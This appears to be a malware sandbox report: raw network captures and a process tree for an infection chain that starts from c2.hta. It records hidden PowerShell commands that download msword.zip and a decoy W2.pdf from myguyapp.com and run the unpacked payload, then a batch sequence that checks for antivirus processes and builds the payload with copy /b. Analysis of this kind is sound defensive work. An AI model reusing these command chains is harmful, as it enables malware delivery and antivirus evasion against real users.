Nd'Q)[j2dr55Og_VDk*N1#F`n5zS@wpSZLoNL&CV/w5{3KU
2025-01-07 05:23:01 UTC	16384	IN	Data Raw: 0b 1b d6 19 55 e7 74 6c c9 71 49 89 c3 12 6a 24 da 69 aa 34 d6 b4 d6 f9 d5 15 53 34 4c c4 c6 13 13 84 c4 e5 31 30 e5 62 71 7f 83 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 69 2e c0 5f 3e dd 8b ef bf ea 79 85 65 b4 6f ce 3e cb f8 13 fa da d1 3c 6d af ee ed a7 ef cf eb 3a 1d c2 6e d9 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 de cf df 3f 2d b7 ef 8f ea 09 64 9b b7 9f ce 42 d7 f8 0b fa c6 cd 43 6d 4f ee 95 9f ef ff 00 eb 4a dd 3a 61 1a e0 00 00 00 00 00 00 00 00 00 34 97 60 2f 9f 6e c7 f7 db f5 3c c2 b2 da 37 e7 1f 65 fc 0b fd 6d 68 9d f6 d7 f7 76 d3 f7 e7 f5 95 0e e1 37 6c 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 73 67 ff 00 9f 96 db f7 c7 f5 Data Ascii: UtlqIj$i4S4L10bqi._>yeo><m:n f?-dBCmOJ:a4`/n<7emhv7l3sg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49736	193.26.115.39	443	6608	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-07 05:23:05 UTC	167	OUT	GET /msword.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: myguyapp.com Connection: Keep-Alive
2025-01-07 05:23:05 UTC	285	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 05:23:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Tue, 07 Jan 2025 04:07:46 GMT ETag: "32c75b-62b15e32f7b89" Accept-Ranges: bytes Content-Length: 3327835 Connection: close Content-Type: application/zip
2025-01-07 05:23:05 UTC	7907	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 f2 25 27 5a 49 e0 91 a0 e5 c6 32 00 88 29 a0 23 0a 00 00 00 6d 73 77 6f 72 64 2e 65 78 65 ec bd 7f 7c 54 c5 b9 3f 7e f6 47 c2 92 6c d8 45 12 0c 1a 34 42 50 94 1f 8d 2e 28 71 41 17 c8 09 d1 b2 b8 b8 66 17 94 00 2a c4 c3 16 81 92 73 f8 d1 12 4d 38 49 65 3d ac b5 d6 de 6a 6b 6f 4d b1 ad 6d 6d a5 ad 95 a8 88 09 20 09 4a 2d 0a c5 b4 e0 35 22 d5 59 37 ea 2a 31 2c 10 39 9f f7 33 b3 1b 02 d7 b6 f7 f3 79 dd ef 7f df e0 ec 99 33 e7 99 99 67 9e 79 7e ce cc 39 fa 6f 7f 58 b2 49 92 64 47 32 4d 49 6a 91 c4 9f 4f fa f7 7f fb 91 86 5c fa e2 10 e9 b9 c1 7f be ac c5 32 fb cf 97 dd a6 2c ab 2d 5e b5 7a e5 3d ab ef bc b7 f8 ee 3b 57 ac 58 a9 16 df b5 b4 78 b5 b6 a2 78 d9 8a e2 f2 5b 82 c5 f7 ae 5c b2 74 62 5e 5e 4e 49 ba 8d e9 df 7e f3 1b 59 17 Data Ascii: PK%'ZI2)#msword.exe\|T?~GlE4BP.(qAfsM8Ie=jkoMmm J-5"Y71,93y3gy~9oXIdG2MIjO\2,-^z=;WXxx[\tb^^NI~Y
2025-01-07 05:23:05 UTC	16384	IN	Data Raw: 61 f6 f4 28 42 2f 71 21 c6 59 c4 c7 f9 bd 2f 33 d8 0f d2 3f b1 7a 4f d4 fe 83 a6 99 14 95 f7 c4 ea 15 3c de 26 47 9d 7d 38 9e af 98 5f 9d 46 f8 ee 31 b4 f9 cc 8f 8b cc 43 16 2c e1 d6 f3 9e 21 35 c8 be 71 09 f9 16 e8 bb 88 5d 8c 61 b1 4d e8 c1 2c d8 8d 59 2a 03 94 ab f1 63 c2 96 36 ff 38 9e bf bf 8c e2 0d b3 e0 29 1a 9b 83 8f 6d 34 1a 14 fa 31 98 d9 95 55 5f a8 0a 0a 39 09 8a 63 29 35 65 13 08 0f 2d 37 8d cf 81 12 89 da 2b 12 27 03 5e 2d a1 b3 18 c4 61 8e 55 b8 7d 1e b7 91 8b 16 ed 60 d0 3f fc 8c a1 b9 b5 98 94 30 7b 7c bc 38 f7 d1 20 70 53 6f 8c 58 42 0a 29 76 b3 e0 c9 7a de ef 84 aa 10 3b 54 2a 65 aa 95 f0 6a 77 51 35 f6 1f 98 28 ef ab 6a 6e 5a 92 88 04 35 66 16 75 78 8b f6 78 55 90 fd 14 d5 e2 67 c0 1c 65 13 68 15 53 fd 76 c4 c6 2e 05 67 47 ec 46 27 1b Data Ascii: a(B/q!Y/3?zO<&G}8_F1C,!5q]aM,Yc68)m41U_9c)5e-7+'^-aU}`?0{\|8 pSoXB)vz;TejwQ5(jnZ5fuxxUgehSv.gGF'
2025-01-07 05:23:05 UTC	16384	IN	Data Raw: 1f 6a 79 1c 50 ad 36 82 75 5f 87 90 f4 50 b0 23 0f d2 97 37 c7 b8 bc fd 44 6b bf df 68 6e 7f 79 2c 4a ac 6d 54 5f fc 8a c5 ba 20 2f af d0 e6 c8 7c 25 8a f5 86 ec 66 fa 56 24 8f 66 e8 e5 f2 c1 f4 34 16 e9 d8 c5 11 e5 d7 2d fd 6f 7b 1b 49 3b d1 0d a3 fc 4f 1c 76 ef 3f d1 f9 fe b5 ff 12 bb 7f b2 84 f4 8e ce 20 a9 10 c5 c2 fd be f3 f7 cd 8d de d8 e5 8a 11 9a a1 4f c5 2e cc c4 f6 b6 42 df 89 54 09 39 2e 0f d6 55 31 52 1a 52 9e 2c 1c 3d d4 72 86 a9 8c e0 17 34 d7 3c 5b 7a 74 7e b9 ac 7e bb 92 7f 0f 7b 7c 3e 29 82 97 74 e5 e0 ed b9 57 ba 3e fe 8f e4 b6 b6 41 a1 62 1a 40 d1 f8 51 2d 8f 1f bb e9 0c 3e 3b 3b f8 b4 f5 79 30 da 51 f5 e7 b7 b5 8f 82 e9 86 44 d1 93 a4 2b 17 1e b6 ee c6 e5 2c 3f 4e 56 3b b6 05 6b ab 3d fa 7e bd 7c a9 bb 58 d3 7e b1 2c 55 52 5c 50 dc 73 Data Ascii: jyP6u_P#7Dkhny,JmT_ /\|%fV$f4-o{I;Ov? O.BT9.U1RR,=r4<[zt~~{\|>)tW>Ab@Q->;;y0QD+,?NV;k=~\|X~,UR\Ps
2025-01-07 05:23:05 UTC	16384	IN	Data Raw: 0b 71 3f d9 16 d0 02 37 c7 dc 80 cb ce aa 84 46 c5 0f 33 f5 5c 03 9b 4e 1f 43 95 b7 6d b2 2a 2e d5 b6 10 b8 e6 e4 7d 39 20 98 e1 5a e4 d8 fe 47 81 ad d1 3d b8 0e 79 5c 45 f6 e4 1c 86 a0 ee 16 fb e4 41 58 f3 f1 0d a7 45 f4 1f 65 d0 e3 70 98 39 f6 b2 a3 f5 6f 69 8b 54 b0 b8 6f 77 64 e4 73 50 7c da 3c e4 d9 19 7e 31 ef e0 d7 61 78 2b 59 61 6f 3f 37 54 e0 26 4e 30 8b 23 fc f8 5b fa 20 87 06 fd c7 f8 f8 a8 bd 09 87 f0 2e ba 37 70 e8 79 62 be 7f 93 20 14 b5 3d 52 e4 de 45 e1 35 a9 3e 74 14 3a 6e 3f 65 ca 09 eb 8b f9 67 fb f7 84 f0 32 7d b9 ec 35 c4 a3 f5 1c 95 b2 6f 16 4e 8e 69 cd fd f2 5f 5a bf 66 4e 08 91 9a b8 a1 42 2d 69 f2 f1 2d 59 3a 1a 04 02 36 53 c9 7e 6f 80 85 90 ed 18 a4 65 5e 3a 70 48 96 49 4b 62 2a c6 14 76 1a 3a 74 4b 4d 42 3f ba 03 eb 67 f6 0c 21 Data Ascii: q?7F3\NCm.}9 ZG=y\EAXEep9oiTowdsP\|<~1ax+Yao?7T&N0#[ .7pyb =RE5>t:n?eg2}5oNi_ZfNB-i-Y:6S~oe^:pHIKbv:tKMB?g!
2025-01-07 05:23:05 UTC	16384	IN	Data Raw: 78 17 c6 06 41 9f a8 b5 9f 3e 85 5f cb 6f 8c 3c a8 3b 86 aa e1 39 c9 3d 21 bd 16 d1 36 fd 3c 2b ae e4 53 63 6f a9 a8 5e ed dc 58 e9 4b 45 fe 96 16 59 8e a1 6b a1 ac c9 9a b1 5f 78 7f 46 8a bd b4 d2 58 c7 db 74 64 64 f0 63 92 71 72 df bb 74 87 fb f8 17 ba 90 a7 c6 f6 2f dc d9 cc c0 39 d7 e5 9f 3f fa 7e 41 d8 d7 ee c7 0e c7 8e d4 42 cd f5 db 1c 56 32 0f c8 07 4f c8 bd f8 a4 43 ba 6f 5e e3 1b b6 ca c1 42 4a 4e 66 bd 3e df 54 ca 7a bb 69 cb 6f 7e e8 3c 93 5e 12 1b 49 ae 5a f1 cb 75 46 5e 8e f9 ae 4e 22 33 49 f8 94 bc c9 12 bb 72 92 52 63 fe ea c2 07 83 b6 5c d4 47 db b7 4f 5f 4a 72 f3 bd 12 e3 b6 8c 39 12 c1 37 c7 62 89 e5 25 ab 56 25 d8 dc be ab a1 ab b3 f4 fa 73 61 d1 29 c6 5f 21 81 34 ad a2 18 5d 7d 11 95 f8 b8 5b 93 93 21 ef df 70 38 5e a1 9b 7e 75 70 29 Data Ascii: xA>_o<;9=!6<+Sco^XKEYk_xFXtddcqrt/9?~ABV2OCo^BJNf>Tzio~<^IZuF^N"3IrRc\GO_Jr97b%V%sa)_!4]}[!p8^~up)
2025-01-07 05:23:05 UTC	16384	IN	Data Raw: 0c b8 8d 75 14 bd 50 7e 58 d6 dc 97 68 f7 f4 46 69 48 21 55 31 c7 d8 1f 42 e5 b5 c7 71 9d 8d f4 c6 ae d9 8d 36 aa ab 07 62 da a0 f0 24 95 e1 74 e0 c7 fc 90 f0 cd cf 5b f7 1e 32 aa 4c 1b eb 79 83 92 7b 17 41 77 3c 30 62 54 ed 59 11 ba e7 c8 27 e5 ac a1 e8 04 d9 2b ca 6a ef 78 41 71 ea e0 cf 5e 23 1c f5 d2 18 0e 2c ac 80 1e ca 20 fc e2 47 95 b0 1a c6 bf 2a f4 d5 8e 8a 8e a3 3b 28 19 a4 ae 7a 94 98 d2 cf 62 b3 2d 91 18 9a 3f 16 03 7a 83 60 46 bb d3 ab 1e 80 5b 86 d6 ef 0b c4 e3 2a f1 49 fd 50 8e 54 71 6f 00 89 d7 d9 b2 b5 ad f5 6f 7d 3d cd 8c dd 16 50 7a 1e 92 36 85 d3 0d 46 09 e6 68 88 20 d5 1c 7b 60 66 d5 f7 a8 1a f7 9b 5b 90 5f cb 5b 8f 19 b1 fa fa a8 4f aa 4c a9 ca 3e f4 d7 c9 2a 75 66 c7 fb e9 90 4a 24 54 7a db 4c 22 3c 6a fb b4 35 28 71 63 63 1c 7b 17 Data Ascii: uP~XhFiH!U1Bq6b$t[2Ly{Aw<0bTY'+jxAq^#, G;(zb-?z`F[IPTqoo}=Pz6Fh {`f[_[OL>*ufJ$TzL"<j5(qcc{
2025-01-07 05:23:05 UTC	16384	IN	Data Raw: c8 f1 b1 16 b6 04 a4 9e 4d 26 a1 a6 41 cc 6b 47 10 07 aa 89 28 4d ff 38 8e 7c e8 77 d3 4b 50 cf e0 20 d5 7a 2b 2c b9 9d 05 2b b3 9a 79 61 eb 9e fb 0e ef 33 c2 c3 9e a0 bb d8 ba 7c 6d db 22 1f f6 c8 3c 15 bc 9d ae 24 5c 02 92 5a 0f 1e 2d 74 52 b4 fd 1f 71 b8 db 44 89 31 a9 65 1d 0f b7 c7 88 d6 69 6b 96 91 8c c9 1a b1 9b b5 38 b2 1f 78 8c ad fe 61 45 5f d0 5b b8 9f 54 e6 4a 26 e8 b9 0d 0d 2b 61 11 44 07 a0 d9 02 fa 71 e4 21 1c b9 2a f0 a3 f3 f2 cd 71 48 df 2c 87 f6 cc 3e f9 4b 09 63 c3 66 d1 0b b2 27 fd 52 95 90 ff 5b 9f 24 eb b3 f7 22 3c 52 af 26 de 86 1f 3f 43 de 4e d5 cf 47 fe b3 f2 95 bd 4a a6 45 01 96 01 a3 9f 5c c5 9a cc f4 43 71 95 9e 0c 43 e3 db 41 b0 e7 ad d4 42 62 8a 16 43 a6 44 dd 17 71 1f 0a 37 22 fa 01 61 35 cb 70 ae 17 14 4b 3a fb fa 9f f1 ed Data Ascii: M&AkG(M8\|wKP z+,+ya3\|m"<$\Z-tRqD1eik8xaE_[TJ&+aDq!*qH,>Kcf'R[$"<R&?CNGJE\CqCABbCDq7"a5pK:
2025-01-07 05:23:05 UTC	16384	IN	Data Raw: fc ba 41 17 27 71 f4 cc 50 ba 65 43 a0 ff f4 7a 06 9b ea 11 26 98 d9 5d c1 a5 5e c4 1f 46 6a af 21 3d 11 7b 15 05 55 cc bf 18 81 a0 85 6f a6 c8 5d 2b ae 35 5a 23 5b 0c 8a bc c1 6c 42 ce ba 26 89 94 bc 15 53 c2 d7 20 b2 ca b9 af 7a 8e d0 9a 2e 0f b2 67 f7 92 cb 67 72 f3 6a 02 6a 77 7b 0c df 29 1b a0 bd cb 6b 7f d3 0a 4d 9c d4 c9 7b 85 38 b4 95 f5 da 5c bf 83 48 2d 29 62 66 2d 7b 87 70 4d 89 f5 cf d7 15 e5 2c e7 87 05 f8 f4 d6 bf 80 f3 7e 61 60 ae 7b 55 68 8f d8 ae 43 eb 3f e7 68 c4 7a cb 50 61 19 18 90 25 8e 47 72 f4 78 10 2c 7d 94 28 95 0e 9b 65 db c9 eb 6b 11 31 1b 22 03 e0 20 a1 6b 16 a8 3b af bd 39 5f 42 0e 76 f4 3b 82 bc ec 65 66 d9 58 10 41 dc ff b3 35 50 44 6e 22 6f 74 ad 51 c2 bd 14 19 57 ec 49 e0 fc 9c 88 7f 50 cb 63 5f a3 53 8e 27 0b a3 3a 32 84 Data Ascii: A'qPeCz&]^Fj!={Uo]+5Z#[lB&S z.ggrjjw{)kM{8\H-)bf-{pM,~a`{UhC?hzPa%Grx,}(ek1" k;9_Bv;efXA5PDn"otQWIPc_S':2
2025-01-07 05:23:05 UTC	16384	IN	Data Raw: 98 31 45 a7 17 35 46 86 c2 eb 5d 87 0c a0 ab 62 2f 77 24 07 ed 5e f5 23 bd 32 42 ae be df 26 49 23 ef 41 28 32 0b 80 59 4a 24 87 32 0b bc 81 2a 5e 7a 92 7c 02 27 f0 57 10 84 8c 04 65 18 d4 34 2c 99 da 67 b7 90 5e 83 0d 11 e9 dc 97 6b b5 da 43 7c 38 d5 cd 72 b2 b1 bd 62 22 bb 04 5b c5 a9 62 10 39 ef 69 ab 7d b1 49 47 58 8c e7 7f 0f 3a 02 52 30 6a 10 8e fa 36 3d 12 3b 1b 10 a1 fe 8e 1b 6f 58 f0 59 68 0a 8b b1 33 8f 4f 5f bd 5c f5 7c 88 55 8f 75 da 77 d2 8e 9d 03 f9 af 59 7d ff ca 52 5b cd 84 41 72 19 71 05 2a 63 db c1 9b f1 b3 64 f2 c7 18 75 4d f3 3a 1d d9 5a 34 8a af bc 79 da 4a d6 38 cb a7 eb c2 5c bd a8 1c b2 7a 47 1f 53 09 d2 b8 ae 81 0f db 5c ca 59 4f eb 1c 1f 91 33 e6 11 47 37 82 7e 04 b4 c3 36 03 c4 10 93 cb be bd 8a 89 2d 21 1e 00 ed c5 8a 45 e0 4f Data Ascii: 1E5F]b/w$^#2B&I#A(2YJ$2^z\|'We4,g^kC\|8rb"[b9i}IGX:R0j6=;oXYh3O_\\|UuwY}R[ArqcduM:Z4yJ8\zGS\YO3G7~6-!EO
2025-01-07 05:23:05 UTC	16384	IN	Data Raw: d9 05 a6 75 a8 5f f6 e4 fc 3a 3e 66 e7 6e ed cd 7e 08 7f 67 fc 69 38 95 a7 b3 c3 f6 10 10 9c 5c c4 53 df 65 c9 a7 7f 3d ff 56 1a 38 f0 43 f2 9a 49 21 fc b6 0e b5 fb 70 10 a0 0d 94 7a 73 cf a6 f9 1e b7 1a d4 60 8b 25 b6 84 c4 d1 46 dd 60 05 70 d0 22 d8 16 4f aa 86 ed 3a 79 cb 50 d7 7b c6 ac 42 e8 d9 1c b0 97 8a a8 b9 31 aa 55 4b 6b 02 0d 24 45 c2 4e e0 4c 2f b6 7b 33 20 db 91 13 74 e8 97 78 85 40 6a 79 ba ea 7f 35 16 15 68 d5 c9 55 c9 6d 5f de 2a 0a 3a 7b e5 08 d6 e8 8a 17 3c 57 9a 85 66 20 51 e9 00 40 4b 82 45 9e a0 d4 5c 8f 1c ff 1d a1 9e 03 1f a2 92 5d cf e3 7b d5 a3 f2 e2 27 9c 9b 3a 5e cd f7 84 d0 d3 f8 1c 54 a2 5e 1f 96 14 3c 50 5a f3 2d 13 da bb e6 92 61 af e5 f0 65 96 dd be 60 93 cb 58 05 d1 13 08 b2 cb 7c 9b 1f 41 eb c0 62 3e fe 38 77 bf ba 97 10 Data Ascii: u_:>fn~gi8\Se=V8CI!pzs`%F`p"O:yP{B1UKk$ENL/{3 tx@jy5hUm_*:{<Wf Q@KE\]{':^T^<PZ-ae`X\|Ab>8w

Target ID:	0
Start time:	00:22:56
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\c2.hta"
Imagebase:	0xf80000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:22:58
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:22:58
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	00:22:58
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Imagebase:	0x2a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	00:23:01
Start date:	07/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
Imagebase:	0x7ff6bc1b0000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	00:23:02
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Imagebase:	0x2a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	00:23:03
Start date:	07/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff74bb60000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	00:23:03
Start date:	07/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1620,i,2619577598228726768,6450084149098327694,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x800000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	00:23:12
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Imagebase:	0x2a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	00:23:33
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
Wow64 process (32bit):	true
Commandline:	msword.exe
Imagebase:	0x400000
File size:	597'698'952 bytes
MD5 hash:	83D9A510045DCEB6F520B7599A4B70A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	00:23:33
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	00:23:33
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	00:23:33
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0xeb0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	00:23:34
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	00:23:34
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	00:23:36
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x9f0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	00:23:36
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x960000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	00:23:36
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x9f0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	00:23:36
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x960000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	00:23:37
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 361684
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	00:23:37
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Approaches
Imagebase:	0x410000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	00:23:38
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "Korea" Measurement
Imagebase:	0x960000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	00:23:38
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	00:23:38
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	00:23:38
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
Wow64 process (32bit):	true
Commandline:	Propose.com U
Imagebase:	0x2e0000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
